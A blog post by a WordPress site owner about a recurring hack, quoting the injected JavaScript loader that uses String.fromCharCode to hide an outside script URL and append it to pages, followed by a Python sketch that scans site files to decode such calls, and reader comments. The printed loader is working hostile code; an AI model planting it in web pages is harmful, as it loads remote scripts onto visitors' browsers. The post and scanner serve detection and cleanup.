These damn people - sorry for the bad words. Site got hacked again!
You remember how I told you that people are hacking my site? Well, the problem still goes on.
People from everywhere. Meanwhile I am getting this since I've installed Wordfence Security:
What people are doing is inserting a link to this:
If something like this has been entered:
var gdjfgjfgj235f = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
This will lead from the String.fromCharCode array function to the following URL:
scripts.trasnaltemyrecords (I've omitted the rest, but you can still search for this).
If this is found anywhere in any file of your WordPress installation, it seems you have been hacked.
No matter how many times I repaired the installation - even when the post comment function is turned off - they somehow found a way to use it.
But now I found out what they do. Though I do not know completely HOW they are doing it.
If someone else knows, tell me.
I wrote a C# program today to uncover these things. Now you can find what
104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48
means in an instant. See the screenshot below.
Every time I find a new encoding I will add it to my decoding function.
So I can see what's happening in an instant...
Be safe. And hope you'll never encounter the same problems.
If you do just ask me and I'll tell you what you can do about that.
But I cannot yet tell you how to prevent yourself from that happening to your website again.
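Added example, not part of the original post and not the author's C# program: a Python sketch of the same idea, which finds `String.fromCharCode(...)` calls in the files of a site, decodes the number list and reports the host it points to. The sample snippet and its URL (`injected.example`) are constructed placeholders, and the function names are hypothetical.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# String.fromCharCode(104,116,...) with decimal arguments only.
CALL_RE = re.compile(r"String\.fromCharCode\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)")

def decode_charcodes(args):
    """'104,116,116,112' -> 'http'. JS truncates each code to 16 bits."""
    chars = []
    for token in args.split(","):
        code = int(token) & 0xFFFF
        # Lone surrogates cannot be printed or written out; substitute U+FFFD.
        chars.append("\ufffd" if 0xD800 <= code <= 0xDFFF else chr(code))
    return "".join(chars)

def find_encoded_strings(text):
    """Return [(line_number, decoded_string, host_or_None), ...] for text."""
    findings = []
    for match in CALL_RE.finditer(text):
        decoded = decode_charcodes(match.group(1))
        try:
            host = urlparse(decoded).hostname if "://" in decoded else None
        except ValueError:  # malformed URL, still report the decoded string
            host = None
        line_no = text.count("\n", 0, match.start()) + 1
        findings.append((line_no, decoded, host))
    return findings

def scan_tree(root, suffixes=(".php", ".js", ".html", ".htm")):
    """Yield (path, line_number, decoded_string, host) for files under root."""
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            text = path.read_text(encoding="utf-8", errors="replace")
            for line_no, decoded, host in find_encoded_strings(text):
                yield str(path), line_no, decoded, host

# Constructed sample in the shape of the injected snippet; the URL is a placeholder.
PLACEHOLDER_URL = "https://injected.example/x.js?id=1"
SAMPLE = (
    "var d=document;var s=d.createElement('script');\n"
    "var pl = String.fromCharCode("
    + ",".join(str(ord(c)) for c in PLACEHOLDER_URL)
    + "); s.src=pl;\n"
)

if __name__ == "__main__":
    for line_no, decoded, host in find_encoded_strings(SAMPLE):
        print(f"line {line_no}: {decoded!r} (host: {host})")
```

Running `scan_tree` over a copy of the WordPress directory lists every file and line where such a call decodes to a URL, which gives a worklist for the manual cleanup.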
Recent Comments
Check your plugins against the Wordfence list. Make sure they are updated.
It sounds like you have a malicious script installed in the file structure of your site. I'm surprised that Wordfence isn't able to deal with it.
Thanks for the kind words @Labman. :-)
I already did and found out what happened.
I fixed it so far now that no one else has seemed to be able to get in anymore.
All that's left to do is "just" to fix all the files now.
They all point to the malicious domain.
So I've deactivated the plugins at first by naming the folders with a prefixed underscore.
One after another will now be repaired manually by me.
Which will for sure still take a lot of time.
P.S.: If anyone needs some pointers on how to fix this, if you're encountering the same problems, don't hesitate to hit me up.
Because we all know how annoying this can get, don't we?
:-)
P.S.: To all wealthy affiliates:
Have a beautiful day.
That's scary.